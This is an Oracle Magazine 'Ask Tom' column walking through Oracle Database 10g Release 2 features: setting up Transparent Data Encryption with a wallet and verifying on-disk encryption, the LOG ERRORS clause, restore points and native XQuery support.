Authorized users need not deal with encryption keys; the data will be decrypted (and encrypted) for them quite transparently. The data is stored encrypted on-disk, so that even if someone steals your database, the information is protected. My account of my experience with Transparent Data Encryption is not intended to be a thorough "here is everything you can do" example of this new feature, but rather it shows how the feature is set up and how you would use it. The first thing I had to do was to set up a wallet. This is where the encryption keys will be storedand this file is password-protected. For my quick-and-dirty demonstration, I simply created a directory named "wallet" off my Oracle home and put the following into my sqlnet.ora file: WALLET_LOCATION= (SOURCE=(METHOD=FILE) (METHOD_DATA= (DIRECTORY=/home/ora10gr2/wallet) ) ) Once that was done, all I needed to do was to open the wallet: SQL> alter system 2 set encryption wallet open 3 identified by foobar; System altered. This is something you must do at database startup once, when you start using this feature (or else the encryption keys won't be available to the system, and therefore the encrypted data won't be available either). Now, since I had not set up any encryption keys, I needed to do that: SQL> alter system 2 set encryption key 3 identified by foobar; System altered. In this case I let the system generate the key, but I could just as easily have specified a key of my own choicesomething I might do if I wanted to move this data around from system to system easily. And that was it for setup. I was ready to store encrypted data: SQL> create table t 2 ( c1 varchar2(80), 3 c2 varchar2(80) encrypt ) 4 tablespace test; Table created. SQL> insert into t values 2 ( 'this_is_unencrypted', 3 'this_is_encrypted' ); 1 row created. This data was transparently encrypted on-disk and decrypted when we queried it: SQL> select * 2 from t; C1 C2 ---------------------- --------------------------------------- this_is_unencrypted this_is_encrypted How could I confirm that this data was, in fact, encrypted? I used strings and grep (a UNIX utility to search files) on the Oracle datafile to see if I could see the string. First, I made sure the block containing the encrypted data was written to disk: SQL> alter system checkpoint; System altered. And then I looked for the strings. I looked for any string in the encrypt.dbf datafile that had "this_is" in it: $ strings -a encrypt.dbf|grep this_is this_is_unencrypted As you can see, only the "this_is_unencrypted" string appeared. The other string was not visible because it was, in fact, scrambled before being stored. ASK Tom Oracle Vice President Tom Kyte answers your most difficult technology questions. Highlights from that forum appear in this column. asktom.oracle.com READ more about Oracle Database 10g Release 2 Oracle Database 10g Release 2 New Features Guide Transparent Data Encryption READ more Tom Expert Oracle: 9i and 10g Programming Techniques and Solutions This quick example exposes the tip of the iceberg with this new encryption capability. Transparent Data Encryption works with external table unloads, data pump, and so on, and GUI toolsincluding Oracle Wallet Managerlet you manage your wallet and passwords. There are also commands to re-key data in the event that you feel the keys have been compromised. I believe Transparent Data Encryption is one of the more revolutionary features in Oracle Database 10g Release 2. LOG ERRORS LOG ERRORS is a new clause in DELETE, INSERT, MERGE, and UPDATE statements in Oracle Database 10g Release 2. LOG ERRORS allows for a bulk statement that affects many rows to record rows that failed in processing, rather than just failing the entire statement. You can issue a statement such as INSERT INTO T SELECT A,B,C FROM T2 LOG ERRORS INTO ERRLOG('BAD_ROWS_FOR_T') REJECT LIMIT UNLIMITED. What this statement does is log into the table BAD_ROWS_FOR_T any row that violates a constraint; for example, it will log errors caused by column values that are too large, constraint violations (NOT NULL, unique, referential, and check constraints), errors raised during trigger execution, errors resulting from type conversion between a column in a subquery and the corresponding column of the table, partition mapping errors, and certain MERGE operation errors (ORA-30926: Unable to get a stable set of rows for MERGE operation.). When an error occurs, the row causing the failure is logged into a "bad" table along with the Oracle error number, the text of the error message, the type of operation (INSERT, UPDATE, or DELETE) as well as the ROWID of the failed row for UPDATE and DELETE operations. This new feature is destined to be my favorite new feature of Oracle Database 10g Release 2. Performing large bulk operations rather than row-by-row processing is superior for speed and resource usage, but error logging of failed rows has always been an issue in the past. It's no longer an issue with this new feature. Restore Points Oracle Database 10g Release 2 includes a new ability to create restore points. Oracle Database 10g Release 1 introduced the ability to flash back a database, but you needed to figure out the system change number (SCN) or time to flashback to. Now in Oracle Database 10g Release 2 you can CREATE RESTORE POINT "X", then do something potentially damaging, perhaps an upgrade of some application, and if the upgrade fails, you simply FLASHBACK DATABASE TO RESTORE POINT "X". You no longer have to create a SELECT statement to find the SCN and record it before flashback operations, or guess what time to flash back to. Native XQuery support Oracle Database 10g Release 2 adds a native implementation of XQuery, W3C's emerging standard for querying XML. This new feature introduces two new functions, XMLQUERY and XMLTABLE. XMLQUERY gives you the ability to query Oracle XML DB repository documents or XML views over relational data using the XQuery language from a SQL client. XMLTABLE maps the result of an XQuery expression to relational rows and columns, so that result can be queried using SQL. In Summary That was just a quick glance at some of the new features in Oracle Database 10g Release 2. Now I'm off to read the documentation in full so I can take advantage of all the new stuff. Send us your comments
http://www.oracle.com/technology/oramag/oracle/05-sep/o55asktom.html
crawl-002
refinedweb
2,584
52.7
Known issues Incompatible browser extensions Due to technical limitations, Fonto Editor is not compatible with browser extensions that modify the page, especially ones that do so to support editing. Using such extensions with Fonto Editor may cause unexpected behavior, including poor performance, sudden selection changes, being unable to move the cursor and/or unexpected changes being made in your documents. If you encounter such issues, please check your browser's configuration and try disabling any extensions (or add-ons in Firefox) that may be interfering. We are currently aware of the following extensions causing problems when working in Fonto Editor: Google Input Tools Avaya If you encounter other extensions that interfere with Fonto Editor or any other Fonto product, or if you are the author of an extension that is not compatible, please let us know. We always try to reach out to and work together with the extension authors to resolve compatibility issues. Deprecation warning for create Attribute Label Widget from the Fonto platform code We are aware of a known issue in Fonto 7.12.0 where the deprecation warning for createAttributeLabelWidget is thrown from the platform code of Fonto. If you see the message "createAttributeLabelWidget is deprecated and will be removed in 7.14. Please use the createLabelQueryWidget instead. See Upcoming deprecations 7.14 for more information.", perform a manual search through your editor for "createAttributeLabelWidget" and replace occurrences as described in the deprecation instructions. Moving cursor while typing will result in misplaced content Moving the cursor using the mouse while keeping a single character key pressed or while typing will result in misplaced content. Content may end up in the element that was first selected. Find and replace does not always show its results in the expected order. Find and replace currently operates in (XML) document order instead of visual order. This affects elements such as footnotes. Find and replace may not always scroll the result into view when the search is stopped To always scroll the correct result into view keep the search running, use scoped search if a full search of all documents takes too long. Using XQuery Update facility in combination with element prefixes may cause elements to be created in a wrong namespace or may cause other namespace-related errors When using XQUF to create an element in a namespace, the prefix will be used to serialize new elements to JSONML. If the prefix is not registered in the Namespace Unexpected behaviour for inserting inline formatting like bold, italic, etc. when a schema contains a single element for multiple types of inline formatting. For example, when a selection starts within bold text, ends outside that bold text and italic formatting is applied, only the non-bold part of the selected text will be italic. Deeply nested list items can exceed the sheetframe border Nested list items can exceed the sheetframe border after a large number of nesting. You can avoid this by limiting the amount of sublists via the configureAsInvalid function. For example by using: configure Please be aware that you cannot open documents with a larger list nesting than 6 in this case. When having an XPath function defined in code and using it in an XQuery Module in the same package, the module/namespace/function is not found This might result in one of the following errors: Error: XQ ST0051: No modules found with the namespace uri ... Function ... with arity of ... not registered.(This error can also be caused by other coding issues) This is caused by the Fonto Editor startup order, which processes the XQuery Modules *.xqm files before the code (per package). In order to work around this issue, move the code to a separate package and add a dependency to the new package it in the existing package. Adding an image to a figure with an image that already has a Fonto Review comment, expands the comment range This is caused by the way positions currently work in Fonto Editor. Positions won't get lost, but just get expanded. Workaround is to use the created context modal to see the original image the comment was placed on. Making a selection when having the display scaled over 100%, the selection shown in the XM L View might not match. Applicable in all supported browsers and all operative systems. This is more common on Windows machines that have a 125% display scale by default. Using inline formatting at the end of a sentence can cause the trailing '.' to be pushed to the next line This is caused by the way we currently create cursor positions for the browser. Screenshots below illustrate the issue. Without the formatting: With the formatting: Horizontal alignment "justify" does not work This is due to the spec allowing browsers to ignore justification when whitespace should not be collapsed, which we use in Fonto. This is noticable in tables that have this setting. Using iframes inside views Using iframes inside views is highly discouraged as iframes frequently re-render every time the view updates. This can be expensive and may affect performance. There are also known browser issues with using iframes inside views.
https://documentation.fontoxml.com/latest/known-issues-98160783004a
CC-MAIN-2021-17
refinedweb
857
51.99
perlquestion prhodes I have one script, two packages, and a module. Let's call them script.pl, pkga.pm, pkgb.pm, and common.pm <p> I have alot of code, but I've stripped out as much content as possible in order to make my question simple and non-ambiguous. <p> Both pkga.pm and pkgb.pm are packages in their own right (in fact they are OO packages containing methods), and start with the Package keyword in order to define them as such. <br>In each package there is just one constructor function which works absolutely fine. <p> This is where the trouble starts .... <br>I have common.pm which is full of lots of useful functions that we use across our site, and I want it to be accessible from everywhere ! <br>So I've placed use common within script.pl, pkga.pm, and pkg.pm. <p> However, when I proceed I get an error like this : <br>Undefined subroutine &pkga::doit called at pkga.pm line 10. <br>doit is the function within common.pm that I am calling from within the constructor method in pkga.pm - although it could be any method. <p> It's clear that perl doesnt like to load the same module within each package - most likely related to the symbol table and keeping namespaces clean. <p> I have discovered a fix - by simply creating another module file as a symbolic link e.g. <br>ln -s common.pm common_for_pkga.pm and then <br>use common_for_pkga; within the pkga.pm package file. <p> However, this seems like a crude fix, and I feel like my understanding of this entire is unsatisfactory. <br>I've done alot of google and monks searches but haven't been able to find a deeper exaplanation, FIX, or workaround. <p> This perl disciple/fan would appeciate any help or pointers. <br>Thanks in advance. Peter.
http://www.perlmonks.org/?displaytype=xml;node_id=1017810
CC-MAIN-2014-41
refinedweb
317
77.84